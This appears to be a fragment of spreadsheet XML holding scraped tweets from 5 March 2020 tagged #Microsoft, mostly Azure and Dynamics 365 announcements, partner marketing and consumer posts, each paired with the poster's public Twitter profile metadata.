    <t>{'id': 551208138, 'id_str': '551208138', 'name': 'Hitachi Solutions America', 'screen_name': 'HitachiSolUS', 'location': 'Global', 'description': 'We are a team of innovators that empower our clients through Microsoft Solutions', 'url': 'https://t.co/1a3QLUFBrR', 'entities': {'url': {'urls': [{'url': 'https://t.co/1a3QLUFBrR', 'expanded_url': 'http://us.hitachi-solutions.com', 'display_url': 'us.hitachi-solutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2588, 'friends_count': 1509, 'listed_count': 154, 'created_at': 'Wed Apr 11 16:30:26 +0000 2012', 'favourites_count': 826, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5393, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '8F9DA2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1146072769500598272/Vwwu2Kyu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146072769500598272/Vwwu2Kyu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/551208138/1561044906', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '732500', 'profile_sidebar_fill_color': 'A00A0A', 'profile_text_color': '0D0301', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 18:02:26 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus panic could spell the end for tech conventions https://t.co/q8UYM5SruD #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 18:02:17 +0000 2020</t>
  </si>
  <si>
    <t>The Train-the-Trainer Online portal has hands-on examples of Train-the-Trainer with specific areas of Instructional Expertise  Enroll Today to Teach Tomorrow  Get #Certified and approved by #Microsoft - https://t.co/hHlcnuap8T https://t.co/kF7FlNQxc9</t>
  </si>
  <si>
    <t>Thu Mar 05 18:02:11 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     VIA @office365    Understanding data protection &amp;amp; compliance (video) https://t.co/Z8tD4iR1fd</t>
  </si>
  <si>
    <t>#cloud  #workfromhome    Tired of being chained to your desk? Want to brush up on your digital skills? Check out this article to learn how you can work remotely with help from communication apps &amp;amp; tools.  Get Teamworksolutions from #Microsoft. https://t.co/B9mRGvCMUp</t>
  </si>
  <si>
    <t>Thu Mar 05 18:01:31 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is delivering on the promise of security AI to help defenders protect todays hybrid environments. Read this article to learn more about how #AI can accelerate change. https://t.co/HF6PCMfffK</t>
  </si>
  <si>
    <t>{'id': 78739135, 'id_str': '78739135', 'name': 'Eduardo Kassner', 'screen_name': 'ekassner', 'location': '', 'description': 'Chief Technology &amp; Innovation Officer, in the One Commercial Partner Group at Microsoft Corporation.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1259, 'friends_count': 393, 'listed_count': 93, 'created_at': 'Wed Sep 30 23:27:18 +0000 2009', 'favourites_count': 585, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2531,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'http://pbs.twimg.com/profile_images/779777698075860992/FlFDAdds_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/779777698075860992/FlFDAdds_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/78739135/1400289500',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</si>
  <si>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18:01:29 +0000 2020</t>
  </si>
  <si>
    <t>AgreeYas very own COO, Arindam Ray Chaudhuri, shares an in-depth look at Microsofts Azure #ArtificialIntelligence with @InsideBigData Read the full article here: https://t.co/YGdpVLwo5E. #Microsoft #MachineLearning https://t.co/WhJ3CIDtMm</t>
  </si>
  <si>
    <t>{'id': 156352772, 'id_str': '156352772', 'name': 'AgreeYa Solutions', 'screen_name': 'AgreeYaGlobal', 'location': 'Folsom, CA 95630 | Global HQ', 'description': 'AgreeYa Solutions is a global systems integrator delivering a competitive advantage for its customers through software, solutions and services.', 'url': 'http://t.co/o2SgBvCLgJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/o2SgBvCLgJ', 'expanded_url': 'http://www.AgreeYa.com', 'display_url': 'AgreeYa.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3217, 'friends_count': 832, 'listed_count': 47, 'created_at': 'Wed Jun 16 18:24:38 +0000 2010', 'favourites_count': 256, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2401, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E9E9E9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214928883792805888/ThL-iX68_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214928883792805888/ThL-iX68_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/156352772/1580490816', 'profile_link_color': '991414', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '78C0A8', 'profile_text_color': 'CE7834', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 18:01:25 +0000 2020</t>
  </si>
  <si>
    <t>All the feels for our dreamy Navy/Cobalt Skinny Sleeves! 
.
.
.
#SkinnySleeve #LaptopSleeve #TabletSleeve #ComputerSleeve #Apple #Dell #Microsoft #SurfacePro #Surface #Macbook #Style #Function #AcmeMade https://t.co/i9Jsq42ZCK</t>
  </si>
  <si>
    <t>{'id': 17330061, 'id_str': '17330061', 'name': 'Acme Made', 'screen_name': 'acmemade', 'location': 'San Francisco', 'description': 'Designed Protection is what Acme Made is all about. From protective laptop bags and sleeves to cool cases and sleeves for cameras, smartphones and other devices', 'url': 'https://t.co/0kJJKjhbOn', 'entities': {'url': {'urls': [{'url': 'https://t.co/0kJJKjhbOn', 'expanded_url': 'http://www.acmemade.com?utm_source=social&amp;utm_medium=twitter&amp;utm_campaign=homepage', 'display_url': 'acmemade.com/?utm_source=soâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1176, 'friends_count': 163, 'listed_count': 53, 'created_at': 'Wed Nov 12 03:20:22 +0000 2008', 'favourites_count': 237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 853,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'http://pbs.twimg.com/profile_images/950446567353274368/T1TYf6i6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/950446567353274368/T1TYf6i6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17330061/1488803874',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</si>
  <si>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18:01:02 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is powering open-source collaboration in China. Where is your company on the path to digital transformation? Contact us to learn how NetOne Technologies can accelerate your journey with #Microsoft #Azure. https://t.co/eiAWviN9d6</t>
  </si>
  <si>
    <t>{'id': 72690495, 'id_str': '72690495', 'name': 'NetOne Technologies', 'screen_name': 'NetOne_Tech', 'location': 'Delray Beach, FL', 'description': 'Palm Beach, Broward, Tampa, Jacksonville and Orlando IT Professionals, Network Design, IT Support, Managed Services, and BDR Solutions', 'url': 'https://t.co/ptOV6fyYac', 'entities': {'url': {'urls': [{'url': 'https://t.co/ptOV6fyYac', 'expanded_url': 'http://www.netonetech.com', 'display_url': 'netonetech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 672, 'friends_count': 1136, 'listed_count': 11, 'created_at': 'Tue Sep 08 22:38:17 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 998, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0A304D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1016421347973615617/_Ec3CeYC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1016421347973615617/_Ec3CeYC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/72690495/1531168694', 'profile_link_color': '0A304D', 'profile_sidebar_border_color': '0A304D', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '0A304D', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 18:00:30 +0000 2020</t>
  </si>
  <si>
    <t>Moment of silence.......
#halo #halo2 #halo3 #halo4 #masterchief #microsoft #console #xbox #xbox360 #xbox1 #xb1 #xboxone #xboxones #xboxonex #xboxgamer #xboxlive #videogamer #videogaming #gaminglife #gamerlife... https://t.co/91BhmV8L2t</t>
  </si>
  <si>
    <t>{'id': 366832028, 'id_str': '366832028', 'name': "Name's Chris", 'screen_name': 'GeekDude96', 'location': '', 'description': 'Geek, GamerðŸŽ®, Music JunkieðŸŽ§, Straight-Edgeâœ–\nFuture Filmmaker? Actor? Comic Book Writer? ðŸ¤” Still finding myself.', 'url': 'https://t.co/ObOGKiA9XF', 'entities': {'url': {'urls': [{'url': 'https://t.co/ObOGKiA9XF', 'expanded_url': 'http://instagram.com/geekdude96', 'display_url': 'instagram.com/geekdude96', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 475, 'friends_count': 1607, 'listed_count': 13, 'created_at': 'Fri Sep 02 22:25:59 +0000 2011', 'favourites_count': 1172, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 17083,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'http://pbs.twimg.com/profile_images/1212544217936879616/DFiLCuZH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212544217936879616/DFiLCuZH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/366832028/1551935313', 'profile_link_color': '2FC2EF',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</si>
  <si>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18:00:27 +0000 2020</t>
  </si>
  <si>
    <t>Use of the #hybridcloud environment is on the rise.
In this blog, we look at #cloudsecurity issues &amp;amp; how a secure hybrid cloud environment can be maintained using #Microsoft Azure. 
Take advantage of Core #cloud planning services with an @Azure Assessment: https://t.co/DKWe4nn7IU https://t.co/QBlweFtQqE</t>
  </si>
  <si>
    <t>Thu Mar 05 18:00:17 +0000 2020</t>
  </si>
  <si>
    <t>Mover migration now available worldwide https://t.co/5RopW2OGjz #SharePoint #Microsoft #Office365 https://t.co/47gxb9c7SH</t>
  </si>
  <si>
    <t>{'id': 14955427, 'id_str': '14955427', 'name': 'Laura Rogers', 'screen_name': 'WonderLaura', 'location': 'Birmingham, Alabama', 'description': '#SharePoint &amp; #PowerApps consultant, trainer &amp; speaker, Microsoft MVP. Complete Office 365 geek. CEO at IW Mentor https://t.co/PBin2GxAdG', 'url': 'https://t.co/ZM9Q33TAb1', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZM9Q33TAb1', 'expanded_url': 'http://www.wonderlaura.com', 'display_url': 'wonderlaura.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/PBin2GxAdG', 'expanded_url': 'http://www.iwmentor.com', 'display_url': 'iwmentor.com', 'indices': [114, 137]}]}}, 'protected': False, 'followers_count': 18952, 'friends_count': 2563, 'listed_count': 1064, 'created_at': 'Fri May 30 15:31:10 +0000 2008', 'favourites_count': 476, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25206, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '040303', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/466580224902062080/odA4KYst_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/466580224902062080/odA4KYst_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14955427/1400077900', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'F8F6F6', 'profile_sidebar_fill_color': 'F4ACAC', 'profile_text_color': '3D0552', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 18:00:03 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus panic could spell the end for tech conventions https://t.co/h8hzIGsZ4L via @GeekTech_App #geektech #technewsapp  #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1209806690167803904, 'id_str': '1209806690167803904', 'name': 'Geek Tech - High Tech News', 'screen_name': 'GeekTech_App_EN', 'location': '', 'description': 'Geek Tech: the application of all high-tech news in real time. Available on Google Play https://t.co/ASXlhYhfln', 'url': 'https://t.co/pbRvgNgXu2', 'entities': {'url': {'urls': [{'url': 'https://t.co/pbRvgNgXu2', 'expanded_url': 'https://geekteck.net/en', 'display_url': 'geekteck.net/en', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ASXlhYhfln', 'expanded_url': 'http://bit.ly/2PWZkfS', 'display_url': 'bit.ly/2PWZkfS', 'indices': [88, 111]}]}}, 'protected': False, 'followers_count': 12, 'friends_count': 0, 'listed_count': 1, 'created_at': 'Wed Dec 25 12:02:57 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3440, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1209806764289482752/YLNmPKh1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209806764289482752/YLNmPKh1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1209806690167803904/1577275798',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</si>
  <si>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18:00:01 +0000 2020</t>
  </si>
  <si>
    <t>An interesting perspective about how sustainability and emission targets are not unlike financial targets.  You need full visibility across the org &amp;amp; supply chain. #Microsoft #Sustainability https://t.co/i611zno73F #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 33953777, 'id_str': '33953777', 'name': 'Chris Di Lullo', 'screen_name': 'chrisdilullo', 'location': 'Winnipeg', 'description': 'Runner, bike/bus commuter - In Winnipeg. Tech innovation, strategy &amp; product.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 730, 'friends_count': 445, 'listed_count': 70, 'created_at': 'Tue Apr 21 16:24:32 +0000 2009', 'favourites_count': 926, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1673,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'http://pbs.twimg.com/profile_images/771390953579880448/VDWYRYeE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/771390953579880448/VDWYRYeE_normal.jpg',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</si>
  <si>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17:59:13 +0000 2020</t>
  </si>
  <si>
    <t>Waiting for #Microsoft #XboxOne to explain why my monthly subscription doesn't actually mean a month! No management available but continual on hold!</t>
  </si>
  <si>
    <t>{'id': 478277136, 'id_str': '478277136', 'name': 'Swan', 'screen_name': 'iamswansongz', 'location': 'Cheshire, UK', 'description': 'Writer, Artist, Musician, Crazy Cat Bloke.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 112, 'friends_count': 585, 'listed_count': 0, 'created_at': 'Mon Jan 30 03:19:33 +0000 2012', 'favourites_count': 5362, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8697,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'http://pbs.twimg.com/profile_images/1029587364031733760/oUCOfcul_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1029587364031733760/oUCOfcul_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/478277136/1534290594',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</si>
  <si>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17:58:08 +0000 2020</t>
  </si>
  <si>
    <t>Looking to buy a new laptop. I'm looking at the Microsoft Surface Book. What do you think? Oh, I'm anti apple #Laptop #Microsoft #Surface #Surfacebook</t>
  </si>
  <si>
    <t>{'id': 32183510, 'id_str': '32183510', 'name': 'LaKisha Lumpkin', 'screen_name': 'misskeela', 'location': '', 'description': "My motto in life: God 1st, Others 2nd, &amp; I'm 3rd. I love my family, friends &amp; wine! ðŸ’™Zeta Phi Beta Sorority, Inc.", 'url': 'https://t.co/yzulyvT5ok', 'entities': {'url': {'urls': [{'url': 'https://t.co/yzulyvT5ok', 'expanded_url': 'http://notjustwhatever.blogspot.com', 'display_url': 'notjustwhatever.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 367, 'friends_count': 281, 'listed_count': 17, 'created_at': 'Thu Apr 16 22:33:50 +0000 2009', 'favourites_count': 619, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 19825, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '02082E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/966879927243964416/voHPA3XZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/966879927243964416/voHPA3XZ_normal.jpg', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'DBE9ED', 'profile_sidebar_fill_color': 'E6F6F9', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 17:56:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft recently published its April 2020 update for #Dynamics365. See our breakdown of the latest updates here. https://t.co/kzTWiurTVW https://t.co/Di2b1QmTiZ</t>
  </si>
  <si>
    <t>{'id': 15826883, 'id_str': '15826883', 'name': 'Centric Consulting', 'screen_name': 'centric', 'location': '', 'description': 'Weâ€™re a management consulting firm that guides you in the search for answers to complex business and technology problems by blending our experts with yours.', 'url': 'http://t.co/bJiVqcnOpj', 'entities': {'url': {'urls': [{'url': 'http://t.co/bJiVqcnOpj', 'expanded_url': 'http://www.centricconsulting.com', 'display_url': 'centricconsulting.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2034, 'friends_count': 1313, 'listed_count': 162, 'created_at': 'Tue Aug 12 19:37:28 +0000 2008', 'favourites_count': 2055, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3986, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '392A66', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1159182051351957504/4hs4EeMx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159182051351957504/4hs4EeMx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15826883/1565205514', 'profile_link_color': 'FFB71B',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</si>
  <si>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17:55:08 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Azure Site Recovery mobility service automated deployment using JetPatch https://t.co/hXQUVgbsdR #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections https://t.co/Da8QWXFLm9 #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure IoT Python SDK v2New improvements are now available  https://t.co/nQxQFuU7L5 #Microsoft</t>
  </si>
  <si>
    <t>#Azure Automatic instance repairs for Azure virtual machine scale sets now in preview https://t.co/VlTR2pFKLf #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 17:54:59 +0000 2020</t>
  </si>
  <si>
    <t>Password management is a challenge. No one likes remembering passwords. Get a password manager that synchronizes between your devices so you always have them. 
#askdigitalplains #password #Security #o365 #Microsoft #MicrosoftTeams #theworldwelivein #cloud
https://t.co/wDkKsUdncY</t>
  </si>
  <si>
    <t>{'id': 350986949, 'id_str': '350986949', 'name': 'DigitalPlains', 'screen_name': 'DigitalPlains', 'location': 'West Fargo, ND', 'description': 'Digital Plains LLC', 'url': 'https://t.co/RAtqDCfRYn', 'entities': {'url': {'urls': [{'url': 'https://t.co/RAtqDCfRYn', 'expanded_url': 'http://www.digiplains.com', 'display_url': 'digiplains.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 86, 'listed_count': 0, 'created_at': 'Mon Aug 08 16:30:34 +0000 2011', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 89, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '5393DB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/762021465172705280/v2U-ClRS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/762021465172705280/v2U-ClRS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/350986949/1470514970', 'profile_link_color': '4B476A', 'profile_sidebar_border_color': '9CDA85', 'profile_sidebar_fill_color': 'CCF9C0', 'profile_text_color': '4E67C3', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 17:54:39 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery mobility service automated deployment using JetPatch  https://t.co/5zg6dMzMMH  #azure #microsoft</t>
  </si>
  <si>
    <t>Azure IoT Python SDK v2New improvements are now available   https://t.co/J0UQC6aI0n  #azure #microsoft</t>
  </si>
  <si>
    <t>Automatic instance repairs for Azure virtual machine scale sets now in preview  https://t.co/QoJuRL2EwT  #azure #microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 17:54:38 +0000 2020</t>
  </si>
  <si>
    <t>Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections  https://t.co/TxCYfviUoe  #azure #microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 17:53:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft unveils the most ambitious corporate climate plan https://t.co/d8EY4oZTR9 
#climateemergency</t>
  </si>
  <si>
    <t>{'id': 1165981904, 'id_str': '1165981904', 'name': 'Aglagw_Blog', 'screen_name': 'Aglagw_Blog', 'location': 'London, UK', 'description': "'A greener life, a greener world' (Aglagw) is a global environmental blog telling green stories that need telling. 'Highly Commended' - UK Blog Awards 2016", 'url': 'https://t.co/KHeqmEUF2k', 'entities': {'url': {'urls': [{'url': 'https://t.co/KHeqmEUF2k', 'expanded_url': 'http://www.agreenerlifeagreenerworld.net', 'display_url': 'agreenerlifeagreenerworld.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 531, 'friends_count': 493, 'listed_count': 145, 'created_at': 'Sun Feb 10 13:52:52 +0000 2013', 'favourites_count': 89, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11788,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'http://pbs.twimg.com/profile_images/854987158331023360/F6MHfXtr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/854987158331023360/F6MHfXtr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1165981904/1568968458',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</si>
  <si>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17:52:20 +0000 2020</t>
  </si>
  <si>
    <t>Join enCloud9 and https://t.co/ZEw88NYe2f on March 20 as we highlight the best new features of the April 2020 Power Apps and Dynamics 365 Update. Register at https://t.co/r5DJB7Doif  #Dynamics365 #PowerApps #Microsoft https://t.co/nvhk8Er5Kb</t>
  </si>
  <si>
    <t>{'id': 2716276104, 'id_str': '2716276104', 'name': 'Brian Begley', 'screen_name': 'brianfbegley', 'location': 'Bellevue Nebraska', 'description': 'Owner of @enCloud9 #MSDyn365 and #PowerApps builders. Biker, Gardener, always working on my house. Three great kids, two dogs and a bird. #MsftPartner', 'url': 'https://t.co/cqJTLSjwdx', 'entities': {'url': {'urls': [{'url': 'https://t.co/cqJTLSjwdx', 'expanded_url': 'http://www.encloud9.com', 'display_url': 'encloud9.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 42, 'friends_count': 99, 'listed_count': 1, 'created_at': 'Fri Aug 08 05:56:01 +0000 2014', 'favourites_count': 16, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 793,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'http://pbs.twimg.com/profile_images/497622537702871040/OU1QD0kH_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/497622537702871040/OU1QD0kH_normal.jpeg',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</si>
  <si>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17:51:03 +0000 2020</t>
  </si>
  <si>
    <t>Upgrade the TLS version of your Power BI application to TLS 1.2 https://t.co/R5baObcw7w #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>{'id': 565028535, 'id_str': '565028535', 'name': 'Haiko Hertes [MVP]', 'screen_name': 'HHertes', 'location': 'Leipzig', 'description': 'Azure Cloud Architect, (Neu)Vater, Motorradfahrer, Reserveoffizier, Fotograf, Microsoft Most Valuable Professional (MVP), Microsoft Certified Trainer (MCT),', 'url': 'https://t.co/oAMy2zpshn', 'entities': {'url': {'urls': [{'url': 'https://t.co/oAMy2zpshn', 'expanded_url': 'http://about.me/haiko.hertes', 'display_url': 'about.me/haiko.hertes', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 346, 'friends_count': 344, 'listed_count': 66, 'created_at': 'Fri Apr 27 21:57:01 +0000 2012', 'favourites_count': 3124, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2122,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'http://pbs.twimg.com/profile_images/970743694763507712/gOo-c8or_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/970743694763507712/gOo-c8or_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/565028535/1520273763',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</si>
  <si>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17:51:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections https://t.co/UfcDeTtraR #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Azure Site Recovery mobility service automated deployment using JetPatch https://t.co/ogwsnDeMcZ #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Azure IoT Python SDK v2New improvements are now available https://t.co/TvSMMbLQq1 #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Automatic instance repairs for Azure virtual machine scale sets now in preview https://t.co/B8Tb44Hzod #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Thu Mar 05 17:50:53 +0000 2020</t>
  </si>
  <si>
    <t>Cool slide #WIDSVANCOUVER #datascie #WiDSVan2020 #Microsoft https://t.co/xhA6ijRPEe</t>
  </si>
  <si>
    <t>{'id': 418249896, 'id_str': '418249896', 'name': 'Nasim Taba', 'screen_name': 'NasimTaba', 'location': 'Vancouver, British Columbia', 'description': 'Data scientist, engineer, perfectionist, live in Vancouver, Canada. Would love to apply my DS skills for human rights. Waterloo and UBC-MDS alumni', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 136, 'listed_count': 0, 'created_at': 'Mon Nov 21 23:07:50 +0000 2011', 'favourites_count': 186, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/2671702484/bbfdcf21c9e3d5a79ad6b8a70fee3aac_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2671702484/bbfdcf21c9e3d5a79ad6b8a70fee3aac_normal.jpeg',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</si>
  <si>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17:50:10 +0000 2020</t>
  </si>
  <si>
    <t>Why the Future of #Association Technology is on the #Microsoft Cloud 
https://t.co/hljQAsxH89</t>
  </si>
  <si>
